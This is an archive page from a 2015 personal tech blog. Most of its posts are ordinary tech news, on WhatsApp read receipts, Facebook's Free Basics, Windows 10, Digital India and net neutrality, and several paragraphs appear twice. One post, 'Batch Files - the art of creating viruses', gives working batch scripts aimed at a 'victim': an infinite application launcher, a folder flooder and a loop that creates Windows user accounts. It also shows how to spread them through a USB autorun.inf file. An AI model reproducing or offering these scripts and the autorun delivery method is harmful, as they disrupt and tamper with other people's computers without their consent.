Sunday, November 1, 2015
Monday, September 28, 2015
How to Remove WhatsApp Blue Ticks aka Read Receipts
Much to the chagrin of its users, WhatsApp quietly introduced read receipts (letting people see exactly when a message is read, not just delivered) earlier this month. The app always showed one tick mark when you sent a message, which changed to two grey ticks when it was delivered. Now, the app shows two blue ticks when the recipient has read your message
This feature was rolled out without an update to the app itself. This means that there was no privacy setting to disable read receipts when the feature was rolled out. The lack of this basic feature in WhatsApp really ticked us off, and we had promised that we'd be back with a tutorial on how to disable WhatsApp blue ticks as soon as it was possible. True to our word, here we are now that WhatsApp has unveiled this feature for Android.
Here's how to get rid of those annoying blue ticks in WhatsApp - but if you do this, then you won't be able to see the receipts either. If you want to check when other people see your messages, then you need to allow them to see read receipts from you. For now, this is only possible for Android users, and only if you manually update the app via the WhatsApp website. WhatsApp typically releases updates first via its website, and then rolls out the update for Android's Google Play store, followed by updates for other platforms, so the update will be available for all devices soon.
This feature was rolled out without an update to the app itself. This means that there was no privacy setting to disable read receipts when the feature was rolled out. The lack of this basic feature in WhatsApp really ticked us off, and we had promised that we'd be back with a tutorial on how to disable WhatsApp blue ticks as soon as it was possible. True to our word, here we are now that WhatsApp has unveiled this feature for Android.
Here's how to get rid of those annoying blue ticks in WhatsApp - but if you do this, then you won't be able to see the receipts either. If you want to check when other people see your messages, then you need to allow them to see read receipts from you. For now, this is only possible for Android users, and only if you manually update the app via the WhatsApp website. WhatsApp typically releases updates first via its website, and then rolls out the update for Android's Google Play store, followed by updates for other platforms, so the update will be available for all devices soon.
The first step is to get the latest APK file from WhatsApp:
- Download the latest (version 2.11.444) WhatsApp apk from the official website.
- On your Android phone, go to Settings > Security > Check Unknown sources, to enable installing apps from outside Google Play. Note that the exact path to the setting can vary depending on your device manufacturer and Android version - the important thing to note is that you enable installing apps from unknown sources.
- Open the apk on your Android phone. This will install the latest version of the app on your device.
(Also see: How to Backup WhatsApp Messages)
Once the app is installed, here's how to disable read receipts:
- Open WhatsApp and tap three vertical dots icon on the top right.
- Now go to Settings > Account > Privacy.
- Uncheck Read receipts
-
- That will disable the blue ticks on WhatsApp. As we noted above, feature isn't available on other platforms or on Google Play as yet, but now that this feature has appeared on the official WhatsApp apk, we can hope that an update will bring it to all platforms. We will update this article when that happens.
Saturday, September 26, 2015
Facebook launches new photo sharing App, Moments
Facebook has launched a standalone app for sharing the photographs among friends. The launch was reported on official facebook newsroom by Will Ruben(Product Manager).
Moments syncs your photographs with all the people who are in those photographs. Moments groups the photos on your phone based on when they were taken and, using facial recognition technology, which friends are in them. You can then privately sync those photos quickly and easily with specific friends, and they can choose to sync their photos with you as well. So, you have all the photos that you are in.
Moments also keeps all of your synced photos organized and even lets you search them to find the ones that you or specific friends are in. Moments uses facial recognition technology to group your photos based on the friends who are in them. According to Facebook, this is the same technology that powers tag suggestions on Facebook.
Moments also gives you options for sharing your private photographs with other friends on Facebook or Instagram. The app has been launched on June 15 in US. It will be launched in other parts of the world soon.
What is Google’s New and Upcoming Service Called 'YouTube Red'?
Interestingly, Google has recently updated its YouTube app that includes a text describing a product called YouTube Red. It’s a service that enables background and ad-free music playback, a feature that was absent in the Music Key subscription service.
The next week, on September 29, Google is holding an event and it’s expected to launch heavyweight products like new Nexus phone as well as Android Marshmallow
It’s expected that YouTube Red will be playing a bigger role in the upcoming Google Movie.
Friday, September 25, 2015
Internet.org is Now Free Basics by Facebook Zuckerberg Launching “Special” Wi-Fi in India
The social networking website Facebook has struggled to create an environment of consensus among the masses for its free internet initiative Internet.org. The company has said that it is working on new ways to enhance the internet connectivity in India.
Along the similar lines, the company has renamed its controversial Internet.org app as Free Basics. With the help of its app, Facebook aims to provide certain free data services and websites to the mobile users.
A few months ago, amid widespread controversies, Facebook opened up the Internet.org platform to the developers. Currently, this moonshot project of Zuckerberg includes 60 new services focused at productivity.
The new app Free Basics by Facebook is also equipped with stronger security measures and aims to get more users online all over the world.
“We’re making this change to better distinguish the Internet.org initiative from the programes and services that Facebook provides, including Free Basics,” says Internet.org Vice-President Chris Daniels.
He adds, “Anyone currently using the app will be able to continue using the Android app though it will now be called Free Basics by Facebook in Google Play.”
The previous Internet.org web URL is now redirected to Freebasics.com.
In India, the social networking website is also piloting Express WiFi service that will encourage the local entrepreneurs to set up WiFi hotspots in various areas.
“We help them in terms of technical solutions, business model and marketing,” said Munish Seth, Country Manager Facebook Connectivity Solutions India. Facebook has already set up such hotspots in partnership with ISPs in parts of Uttarakhand and Bangalore.
Are you excited to use these services? Tell me in the comments.
Wednesday, July 8, 2015
Windows 10 Countdown: How And Why To Reserve Your Free Copy
It’s just over a 20 days till Microsoft makes Windows 10 available in its final form to the masses and as you may already know, it’s free and can be downloaded using Windows Update.
More information is being revealed every week about how the OS will take shape on your system in terms of downloading and installing it, but in the last couple of weeks, a small icon has been appearing on up-to-date copies of Windows 7 and Windows 8. This allows you to reserve your download and be notified the instant Windows 10 is released.
The reason for adding reservations is two-fold. Firstly, and perhaps most importantly, Microsoft is spreading the load on its servers, by allowing the 3gb Windows 10 download to be installed gradually beforehand by users that opt-in to the reservation scheme.
By opting into the reservation now, you’re essentially allowing Microsoft to begin downloading (but not installing) the OS to your PC prior to the release on 29th July so it can be installed instantly.
At the very least, the bulk of the download will hopefully have been completed. Otherwise, you’ll be joining the queue to download on the day and with such a big, popular download hitting Windows Update, this has the potential to massively overload Microsoft’s servers as millions hit the download button.
It’s certainly one of the biggest download events Microsoft has attempted – far bigger than any previous service pack. The release happens on a Wednesday so it’s unlikely that everyone would choose to perform such a massive upgrade to their systems midweek – personally I’ll be waiting till the weekend for most of my systems but I’ll be covering the roll out first hand on at least one.
Secondly, it will allow users who aren’t that fussed about the new OS to be notified of its launch and jump on the bandwagon the instant the OS is available. This does make sense, although it will also add to the launch date download figures for Microsoft to trumpet forever more.
Tuesday, July 7, 2015
Mobiles, cloud shake up Silicon Valley power structure
Smartphones, tablets and other gadgets aren't just changing the way we live and work. They are shaking up Silicon Valley's balance of power and splitting up businesses. Long-established companies such as hp and eBay are scrambling to regain their footing to better compete against mobile-savvy trend-setters like Apple and Google, as well as rising technology stars that have built businesses around cloud computing.
That term covers a swath of internet-driven services that shifted technology from the days software users paid a one-time fee to buy and install programs on individual machines where they also stored all their data on hard drives. But with the advent of the "cloud,'' people can now rent software to use over the internet. This enables customers to access documents, pictures and other vital information from any kind of internet-connected device, a convenience that's become a necessity during the past few years as people increasingly rely on smartphones and tablets instead of laptop and desktop computers.
Business software makers such as Salesforce.com, VMware and Workday built their entire business models around the cloud. All have delivered impressive revenue growth that turned their stocks into hot commodities. Online storage services Dropbox and Box have yet to go public. But they have been minted with big valuations from venture capitalists who believe they will thrive amid the increased usage of mobile devices and cloud-computing services.
That term covers a swath of internet-driven services that shifted technology from the days software users paid a one-time fee to buy and install programs on individual machines where they also stored all their data on hard drives. But with the advent of the "cloud,'' people can now rent software to use over the internet. This enables customers to access documents, pictures and other vital information from any kind of internet-connected device, a convenience that's become a necessity during the past few years as people increasingly rely on smartphones and tablets instead of laptop and desktop computers.
Business software makers such as Salesforce.com, VMware and Workday built their entire business models around the cloud. All have delivered impressive revenue growth that turned their stocks into hot commodities. Online storage services Dropbox and Box have yet to go public. But they have been minted with big valuations from venture capitalists who believe they will thrive amid the increased usage of mobile devices and cloud-computing services.
Thursday, July 2, 2015
Nationwide mobile number portability from July 3
Mobile number portability (MNP) is all set to go nationwide, starting July 3.
According to a report in Hindu quoting Rakesh Garg, chairman, telecom commission and secretary, Department of Telecommunications, mobile service providers will roll out on July 3. MNP allows mobile subscribers to retain their existing mobile phone number even when they change service provider.
At present, mobile subscribers can switch their service provider within the same telecom circle. The pan-India MNP will allow customers to keep their existing mobile phone numbers while shifting between States and circles.
The earlier deadline (May 3) to roll out full MNP was delayed by two months after the Cellular Operators Association of India (COAI) sought extension from DoT as telecom operators needed to make some technical changes to their networks to implement the service.
Announcing its readiness, country's No. 1, telecommunications service provider, Bharti Airtel, said in a statement, "With our complete readiness to launch national mobile mumber portability, we aim to empower customers enabling them to retain this identity as they move across anywhere in the country."
The company has also introduced other services such as faster processing porting requests, free incoming on roaming, balance transfers and carry forward options, which mark as the country's firsts.
According to a report in Hindu quoting Rakesh Garg, chairman, telecom commission and secretary, Department of Telecommunications, mobile service providers will roll out on July 3. MNP allows mobile subscribers to retain their existing mobile phone number even when they change service provider.
At present, mobile subscribers can switch their service provider within the same telecom circle. The pan-India MNP will allow customers to keep their existing mobile phone numbers while shifting between States and circles.
The earlier deadline (May 3) to roll out full MNP was delayed by two months after the Cellular Operators Association of India (COAI) sought extension from DoT as telecom operators needed to make some technical changes to their networks to implement the service.
Announcing its readiness, country's No. 1, telecommunications service provider, Bharti Airtel, said in a statement, "With our complete readiness to launch national mobile mumber portability, we aim to empower customers enabling them to retain this identity as they move across anywhere in the country."
The company has also introduced other services such as faster processing porting requests, free incoming on roaming, balance transfers and carry forward options, which mark as the country's firsts.
Wednesday, July 1, 2015
Digital India
Yesterday Mr PM launched the Digital India Project.
Digital Technologies which include Cloud Computing and Mobile Applications have emerged as catalysts for rapid economic growth and citizen empowerment across the globe. Digital technologies are being increasingly used by us in everyday lives from retail stores to government offices. They help us to connect with each other and also to share information on issues and concerns faced by us. In some cases they also enable resolution of those issues in near real time.
The objective of the Digital India Group is to come out with innovative ideas and practical solutions to realise Hon’ble Prime Minister Narendra Modi’s vision of a digital India. Prime Minister Modi envisions transforming our nation and creating opportunities for all citizens by harnessing digital technologies. His vision is to empower every citizen with access to digital services, knowledge and information. This Group will come up with policies and best practices from around the world to make this vision of a digital India a reality.
Under this the following task will acomplished:-
Using Mobile Phones as Instruments for Digital Identity
Providing a digital identity to all individuals is crucial to facilitate electronic authentication for delivery of online public services. The digital identity must be unique. This help easy authentication . Help in completion of more secure process.
Digital Technologies which include Cloud Computing and Mobile Applications have emerged as catalysts for rapid economic growth and citizen empowerment across the globe. Digital technologies are being increasingly used by us in everyday lives from retail stores to government offices. They help us to connect with each other and also to share information on issues and concerns faced by us. In some cases they also enable resolution of those issues in near real time.
The objective of the Digital India Group is to come out with innovative ideas and practical solutions to realise Hon’ble Prime Minister Narendra Modi’s vision of a digital India. Prime Minister Modi envisions transforming our nation and creating opportunities for all citizens by harnessing digital technologies. His vision is to empower every citizen with access to digital services, knowledge and information. This Group will come up with policies and best practices from around the world to make this vision of a digital India a reality.
Using Mobile Phones as Instruments for Digital Identity
Providing a digital identity to all individuals is crucial to facilitate electronic authentication for delivery of online public services. The digital identity must be unique. This help easy authentication . Help in completion of more secure process.
Shareable Private Space on a Public Cloud
Providing citizens with easy access to a shareable private space on a public cloud can greatly facilitate process reengineering through paperless processes. Citizens can digitally store their documents, certificates, etc. and share them with public agencies or others without the need to physically submit them. Such a ‘digital locker’ will greatly improve citizen convenience and usher in paperless transactions across the entire ecosystem of public services. The access to the private space could be through an online authentication mechanism.
Universally Accessible Digital Resources
Government documents, records, certificates, etc. especially those belonging to citizens, should be digitized and made universally accessible through mandating use of standards and protocols. Application Programming Interfaces (APIs) should be published in conformance with an Open API policy so that data and services are exposed to the outside system for its efficient use. Easy access to the digital resources will help in developing mobile apps and other online applications as value added services by developers and users. Two or more data sets representing similar data may be provided as a linkable data set. Citizens should not be asked to provide government documents or certificates, which are already available with some department/institution of the government, in physical form. Portability of all electronic documents should also be ensured. As an example, the educational institutions should ensure that all their past degrees and certificates are digitized can kept in their data-centres/cloud with appropriate access protocols. The citizen, while filling some application form should not be asked to submit the certified copies of his/her educational certificates but should provide details of these certificates which can be seen by the concerned agency using the pointer provided by the citizen.
Support local communities with digital training
This task requires you to invest time with the local community in explaining how they can access digital technology and services for their benefit. E.g., banking services, government services, training programs, use of social media, etc.
Digital disparity is a stark reality in our country. We have to educate our fellow citizens on how to access and use digital technologies and services for their personal benefit and for the greater good of society. This task will require you to impart digital knowledge and to understand what it takes to make digital services usable and useful to the common man.
Strengthening Optical Fibre Networks
In the last decade it was the road network that gave an impetus to India’s development. Today the need of the hour is to set up optical fibre networks across India that will empower people. This task invites your ideas on setting up a grid of high speed networks with the potential to transform India.
Tuesday, May 26, 2015
Net Neutrality: What You Need to Know Now
What happened?
In May 2014, FCC Chairman Tom Wheeler released a plan that would have allowed companies like AT&T, Comcast and Verizon to discriminate online and create pay-to-play fast lanes.
Millions of you spoke out — and fought back.
Thanks to the huge public and political outcry, Wheeler shelved his original proposal, and on Feb. 4, 2015, he announced that he would base new Net Neutrality rules on Title II of the Communications Act, giving Internet users the strongest protections possible.
The FCC approved Wheeler’s proposal on Feb. 26, 2015. This is a watershed victory for activists who have fought for a decade to protect the open Internet.
What is Net Neutrality?
Net Neutrality is the Internet’s guiding principle: It preserves our right to communicate freely online. This is the definition of an open Internet.
Net Neutrality means an Internet that enables and protects free speech. It means that Internet service providers should provide us with open networks — and should not block or discriminate against any applications or content that ride over those networks. Just as your phone company shouldn't decide who you can call and what you say on that call, your ISP shouldn't be concerned with the content you view or post online.
Without Net Neutrality, cable and phone companies could carve the Internet into fast and slow lanes. An ISP could slow down its competitors' content or block political opinions it disagreed with. ISPs could charge extra fees to the few content companies that could afford to pay for preferential treatment — relegating everyone else to a slower tier of service. This would destroy the open Internet.
What was the FCC’s ‘Open Internet Order’?
The Fcc was intended to prevent broadband Internet service providers from blocking or interfering with traffic on the Web. The Open Internet Order was generally designed to ensure the Internet remained a level playing field for all — that's the principle we call Net Neutrality (we say “generally,” since the FCC’s rules prohibited wired ISPs from blocking and discriminating against content, while allowing wireless ISPs to discriminate against but not block websites).
In its January 2014 ruling, the court said that the FCC used a questionable legal framework to craft the Open Internet Order and lacked the authority to implement and enforce those rules.
Did the court rule against Net Neutrality?
No. The court ruled against the FCC's ability to enforce Net Neutrality under the shaky legal foundation it established for those rules. The court specifically stated that its “task as a reviewing court is not to assess the wisdom of the Open Internet Order regulations, but rather to determine whether the Commission has demonstrated that the regulations fall within the scope of its statutory grant of authority.”
When the FCC made its 2010 open Internet rule, it relied on two decisions the Bush-era FCC made, rulings that weakened the FCC’s authority over broadband Internet access providers. Nothing in the January 2014 court decision prohibited the FCC from reversing those misguided decisions and reclassifying ISPs as common carriers.
In fact, both this decision and a prior Supreme Court decision showed that reclassification would provide the best means of protecting the open Internet.
What does ‘reclassify’ mean?
When Congress enacted the 1996 Telecommunications Act, it didn’t want the FCC to treat websites and other Internet services the same way it treats the local access networks that enable people to get online. Congress understood that the owners of the access networks have tremendous gatekeeper power, and so it required the FCC to treat these network owners as “common carriers,” meaning they couldn’t block or discriminate against the content that flows across their networks to/from your computer.
However, in a series of politically motivated decisions first by FCC Chairman Michael Powell (now the cable industry’s top lobbyist) and then by FCC Chairman Kevin Martin, the FCC decided to classify broadband Internet access service as an “information service,” meaning that the law sees it as no different from a website like freepress.net or an online service like LexisNexis. These decisions removed the FCC’s ability to prohibit ISPs from blocking or discriminating against online content (it also removed the FCC’s ability to ensure that ISPs protect your privacy).
In Verizon vs. FCC, the court stated that the FCC lacks authority because of “the Commission’s still-binding decision to classify broadband providers not as providers of ‘telecommunications services’ but instead as providers of ‘information services.’”
On Feb. 26, the FCC voted to define broadband as what we all know it is — a connection to the outside world that is merely faster than the phone lines we used to use for dial-up access, phone calls and faxes.
Doing so gave the agency the strongest possible foundation for rules prohibiting discriminatory practices.
What did the FCC vote on?
The new rules, rooted in Title II of the Communications Act, ban throttling, blocking and paid prioritization.
Why is Net Neutrality important for businesses?
Net Neutrality is crucial for small business owners, startups and entrepreneurs, who rely on the open Internet to launch their businesses, create a market, advertise their products and services, and distribute products to customers. We need the open Internet to foster job growth, competition and innovation.
Net Neutrality lowers the barriers of entry for entrepreneurs, startups and small businesses by ensuring the Web is a fair and level playing field. It’s because of Net Neutrality that small businesses and entrepreneurs have been able to thrive on the Internet. They use the Internet to reach new customers and showcase their goods, applications and services.
No company should be able to interfere with this open marketplace. ISPs are by definition the gatekeepers to the Internet, and without Net Neutrality, they would seize every possible opportunity to profit from that gatekeeper control.
Without Net Neutrality, the next Google would never get off the ground.
Why is Net Neutrality important for communities of color?
The open Internet allows communities of color to tell their own stories and to organize for racial and social justice.
The mainstream media have failed to allow people of color to speak for themselves. And thanks to economic inequality and runaway media consolidation, people of color own just a handful of broadcast stations. The lack of diverse ownership is a primary reason why the media have gotten away with portraying communities of color stereotypically.
The open Internet gives marginalized voices opportunities to be heard. But without Net Neutrality, ISPs could block unpopular speech and prevent dissident voices from speaking freely online. Without Net Neutrality, people of color would lose a vital platform.
And without Net Neutrality, millions of small businesses owned by people of color wouldn't be able to compete against larger corporations online, which would further deepen the economic inequality in our nation’s most vulnerable communities.
So what can we do now?
The cable and phone companies — and their allies in Congress — will do everything they can to dismantle this win.
Sunday, April 12, 2015
Batch Files - the art of creating viruses
I could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, I have focused on making the basics of batch files clear and developing the approach to code your own viruses.
What are batch file?
Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.Now type these commands one by one
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat
Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it.
This means the three commands executed line by line when we ran the batch file
So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.
What can batch viruses do ?
They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affectperformance,disable firewalls,open ports,modify or destroy registry and for many more purposes.
Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).
1. Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.
3.User account flooder
@echo off
:x
net user %random% /add //create user account
goto x
This code would start creating windows user accounts whose names could be any random numbers.
Spreading batch viruses through pen drive -:
Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.
Thursday, April 9, 2015
Things You Didn't Know About... Computer Hacking
Hi all reader i am back to the blog kcenterand in this blog i can tell u the amazing things about the computer hacking that u don't know or u are not aware by reading all this u get something new.
lets move what is hacking is :-
1. Hacker originally meant “one who makes furniture with an ax.” Perhaps because of the blunt nature of that approach, the word came to mean someone who takes pleasure in an unconventional solution to a technical obstacle.
2. Computer hacking was born in the late 1950s, when members of Mit's tech Model Club, obsessed with electric switching, began preparing punch cards to control an IBM 704 mainframe.
3. One of the club’s early programs: code that illuminated lights on the mainframe’s console, making it look like a ball was zipping from left to right, then right to left with the flip of a switch. VoilĂ : computer Ping-Pong!
4. By the early 1970s, hacker "Cap'n Crunch" (a.k.a. John Draper) had used a toy whistle to match the 2,600-hertz tone used by AT&T’s long-distance switching system. This gave him access to call routing (and brief access to jail).
5. Before they struck it rich, Apple founderssteve and Steve Jobs made and sold “blue boxes,” electronic versions of Draper’s whistle.
6. That same year, six Milwaukee teens hacked into Los Alamos National Lab, which develops nuclear weapons.
7. Think your Mac is hackproof? At this year’s CanSecWest conference, security researcher Charlie Miller used a flaw in Safari to break into a MacBook in under 10 seconds.
8. Cyborgs beware: Tadayoshi Kohno at the University of Washington recently hacked into a wireless defibrillator, causing it to deliver fatal-strength jolts of electricity.
Now u see the scope and the power of the hacking and it is not kid thing .
keep reading and sharing knowledge.
And Folow me an Google+
Also Check how to form Undeletable folder
Wednesday, April 8, 2015
Welcome Post
- Welcome
Welcome
Hello and warm welcome to all the new reader of the hackcenter.
.jpg)
So, guys i clear u all who i am why i made this blog. Myself Anmol Nijhawan and I am a computer science student. I am from India. I love to write code and to develop and to share and this blog is a way to share my experience , my knowledge with u all . I know that everyone wants to learn more and learning is increased by sharing and the life experiences also become memorable after sharing.
One of my mentor always ask me to guide the junior .One day i ask my mentor to why u always force me to guide or teach juniors as i am a coder i love to write codes than he told me that learning never ends dear and by spreading knowledge it always increase many folds.
In this way i inspire to write this blog . By start writing my interest field i.e coding is also done as i wrote all code in html and sharing my knowledge too and thanks to my sir to help me . In this u find the new tricks,coding techniques,cool hacks and human fav thing talks we also have interesting talks.
Now come to the name why hackcenter? As this is the center for all those who want to learn the trick to safe the system ,your data and for little mischef but the auther is not responsible for any demage or any crime done by u.Always learn the hacking tricks for your benfits not to harm others okk.
This blog also help you all to safe your privacy , your confidentiality , and your system from your black hat hackers. Now u think that what are black hat hacker these are the peaple who use there knowledge to exploit other or to theft the things . Help to safe u from all type of cyber crimes .
a hacker is someone who seeks and exploits weaknesses in a computer system . Hackers may be motivated by a multitude of reasons, such as profit, protest, challenge or enjoyment. The subculture that has evolved around hackers is often referred to as the computer underground and is now a known community.while other uses of the word hacker exist that are related to computer security, such as referring to someone with an advanced understanding of computers and computer networks,[3] they are rarely used in mainstream context. They are subject to the longstanding about the term's true meaning. In this controversy, the term hacker is reclaimed by computer science who argue that someone who breaks into computers, whether computer criminal (black hat) or computer security expert (white hat), is more appropriately called a cracker instead.Some white hat hackers claim that they also deserve the title hacker, and that only black hats should be called "crackers".
There are many type of hackers :-
Black Hat hackers, White Hat hackers,Grey Hat hackers,Script Kiddi.
I am not the any one of them i am just the coder feel safe.
And What u all think about the girl hacker Comment on this Lets see what u think about the lady hackers I am waiting for your comments Readers.
I am not the hacker i learn the tricks to safe my self from all these hacks like password bypass and data disclosure etc.
This blog is full of entertainment ,knowledge . Stay connected and always read this as it is a good habbit too and reading build up your creativity and imagination too.
Follow me on Google+ and it is a good social site too.
Subscribe to:
Posts (Atom)